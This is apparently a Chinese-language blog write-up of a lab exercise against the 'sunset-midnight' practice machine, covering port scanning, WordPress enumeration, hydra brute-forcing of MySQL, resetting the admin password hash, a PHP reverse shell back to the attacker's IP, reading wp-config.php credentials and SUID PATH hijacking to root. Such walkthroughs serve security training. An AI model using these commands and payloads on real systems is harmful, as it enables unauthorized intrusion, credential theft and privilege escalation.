一、主机发现+信息收集
(一)信息收集
arp-scan -l
(二)环境变量设置
export ip=192.168.1.135
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql
(四)服务信息收集
nmap -sS -sV -O -p22,80,3306 $ip
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3306/tcp open mysql MariaDB 5.5.5-10.3.22 MAC Address: 00:50:56:3C:94:80 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(五)默认脚本扫描
nmap --script=vuln -p22,80,3306 $ip
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-wordpress-users: | Username found: admin |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-enum: | /blog/: Blog | /wp-login.php: Possible admin folder | /wp-json: Possible admin folder | /robots.txt: Robots file | /readme.html: WordPress version: 2 | /feed/: WordPress version: 5.4.2 | /wp-includes/images/rss.png: WordPress version 2.2 found. | /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found. | /wp-includes/images/blank.gif: WordPress version 2.6 found. | /wp-includes/js/comment-reply.js: WordPress version 2.7 found. | /wp-login.php: WordPress login page. | /wp-admin/upgrade.php: WordPress login page. | /readme.html: Interesting, a readme. | /0/: Potentially interesting folder | /contact/: Potentially interesting folder |_ /home/: Potentially interesting folder 3306/tcp open mysql MAC Address: 00:50:56:3C:94:80 (VMware)
或
nikto -h 192.168.1.135
- Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.1.135 + Target Hostname: 192.168.1.135 + Target Port: 80 + Start Time: 2025-04-07 00:47:58 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.38 (Debian) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: Uncommon header 'x-redirect-by' found, with contents: WordPress. + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + Root page / redirects to: http://sunset-midnight/ + /aCOYkcj5.axd: Drupal Link header found with value: <http://sunset-midnight/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt + Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /home/: This might be interesting. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + /wp-links-opml.php: This WordPress script reveals the installed version. + /license.txt: License file found may identify site software. + /wp-app.log: WordPress' wp-app.log may leak application/system details. + /wordpress/wp-app.log: WordPress' wp-app.log may leak application/system details. + /wordpress/: A WordPress installation was found. + /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + /wp-content/uploads/: Directory indexing found. + /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information. + /wp-login.php: WordPress login found. + 8108 requests: 0 error(s) and 18 item(s) reported on remote host + End Time: 2025-04-07 00:50:01 (GMT-4) (123 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
二、开始渗透
(一)22端口
Nday
┌──(root㉿kali)-[/home/kali/bc] └─# searchsploit OpenSSH 7.9 Exploits: No Results Shellcodes: No Results
爆破
这里我们暂时不知道任何有关用户的信息,所以先跳过这一步,先到Web 中收集信息。
(二)80端口Web应用
访问
我们发现直接访问是访问不到的我们需要先做一个映射,让我们输入的ip可以被解析为域名
WIndows 修改 C:\Windows\System32\drivers\etc\hosts 文件
Linux 修改 /etc/hosts
然后我们就可以正常访问了。并且这是一个wordpress的站
访问 http://sunset-midnight/robots.txt
User-agent: * Disallow: /wp-admin/ Allow: /wp-admin/admin-ajax.php
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1 后台登录页面
没啥信息了,我们用wpscan扫描一下
wpscan --url http://sunset-midnight 直接扫描
[+] URL: http://sunset-midnight/ [192.168.1.135] [+] Started: Mon Apr 7 01:23:38 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.38 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://sunset-midnight/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://sunset-midnight/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator> | - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator> [+] WordPress theme in use: twentyseventeen | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/ | Last Updated: 2024-11-12T00:00:00.000Z | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt | [!] The version is out of date, the latest version is 3.8 | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Css Style In 404 Page (Passive Detection) | | Version: 2.3 (80% confidence) | Found By: Style (Passive Detection) | - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] simply-poll-master | Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | Version: 1.5 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:01 <=========================================> (137 / 137) 100.00% Time: 00:00:01 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Apr 7 01:23:43 2025 [+] Requests Done: 172 [+] Cached Requests: 7 [+] Data Sent: 43.303 KB [+] Data Received: 444.822 KB [+] Memory used: 273.512 MB [+] Elapsed time: 00:00:04
根据信息我们找到了admin用户,可以尝试爆破,并且我们得到了版本信息可以查nday 5.4.2
nday 这里需要插件,没有
那就尝试爆破然后看3306
wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
也是没爆破出来什么,但是3306出货了
(三)3306端口数据库
这里就是尝试爆破了
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
(如果现在没有这个字典的话需要先到改目录下用 gunzip解压一下)
┌──(root㉿kali)-[/home/kali/bc] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-07 01:11:50 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://192.168.1.135:3306/ [STATUS] 12.00 tries/min, 12 tries in 00:01h, 14344387 to do in 19922:46h, 4 active [STATUS] 12.00 tries/min, 36 tries in 00:03h, 14344363 to do in 19922:44h, 4 active [3306][mysql] host: 192.168.1.135 login: root password: robert 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-07 01:18:45
成功找到一组账号root robert
mysql -h 192.168.1.135 -u root -p
我这里的新版mysql爆了一下错
┌──(root㉿kali)-[/home/kali] └─# mysql -h 192.168.1.135 -u root -p Enter password: ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
mysql -h 192.168.1.135 -u root -p --ssl=0
show databases; 查看数据库
+--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress_db | +--------------------+
use wordpress_db 选择一个库
show tables; 查看表
+------------------------+ | Tables_in_wordpress_db | +------------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_sp_polls | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +------------------------+
select * from wp_users; 查看表中的数据
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+ | 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin | +----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
这里是用的md5加密,加密了admin的密码
pmd5.com
ttmd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
找在线网站破解 发现没搞出来
我们直接修改数据库覆盖,反正是root权限
这里直接用md5函数了
update wp_users set user_pass = MD5('123456') where ID=1; 直接update修改
然后访问
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1
admin 123456
直接进入
搞一个php的反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1'");?>
然后Kali里面开启监听
nc -nvlp 4444
在这里直接将代码嵌入进去
http://sunset-midnight/404.php 直接访问拿到shell
三、获得初始权限
四、提权
ls
先看config
cat wp-config.php
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress_db' ); /** MySQL database username */ define( 'DB_USER', 'jose' ); /** MySQL database password */ define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p'); define('SECURE_AUTH_KEY', 'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+'); define('LOGGED_IN_KEY', '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18'); define('NONCE_KEY', '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#'); define('AUTH_SALT', '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa'); define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;'); define('LOGGED_IN_SALT', '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK'); define('NONCE_SALT', 'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
用户 jose 密码 645dc5a8871d2a4269d4cbe23f6ae103
密码解不出来,尝试直接登录
su jose
密码 645dc5a8871d2a4269d4cbe23f6ae103
好吧没有加密直接明文登上了
交互式提升
python3 -c 'import pty; pty.spawn("/bin/bash")'
特权程序
find / -perm -u=s -ls 2>/dev/null
一眼看中了 /usr/bin/status 非标准系统工具
jose@midnight:/home$ status status ● ssh.service - OpenBSD Secure Shell server Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled) Active: active (running) since Mon 2025-04-07 03:33:00 EDT; 1h 21min ago Docs: man:sshd(8) man:sshd_config(5) Process: 539 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS) Main PID: 552 (sshd) Tasks: 1 (limit: 1148) Memory: 3.6M CGroup: /system.slice/ssh.service └─552 /usr/sbin/sshd -D Apr 07 03:33:00 midnight systemd[1]: Starting OpenBSD Secure Shell server... Apr 07 03:33:00 midnight sshd[552]: Server listening on 0.0.0.0 port 22. Apr 07 03:33:00 midnight sshd[552]: Server listening on :: port 22. Apr 07 03:33:00 midnight systemd[1]: Started OpenBSD Secure Shell server.
strings /usr/bin/status string程序硬编码
jose@midnight:/home$ strings /usr/bin/status strings /usr/bin/status /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid printf system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ Status of the SSH server: service ssh status ;*3$" GCC: (Debian 8.3.0-6) 8.3.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7325 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry status.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable _edata system@@GLIBC_2.2.5 printf@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main setgid@@GLIBC_2.2.5 __TMC_END__ _ITM_registerTMCloneTable setuid@@GLIBC_2.2.5 __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment
我们可以看到程序内部存在 system 函数,并且执行了 service ssh status 的命令
那我们就可以进行命令劫持完成提权
echo $PATH 先记一下路径
恶意脚本
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
劫持PATH
export PATH=/tmp:$PATH
执行
/usr/bin/status
输入id发现我们已经是root权限了
之后可以改回原来的PATH变量值
五、提权成功
- THE END -
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/sunset-midnight%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论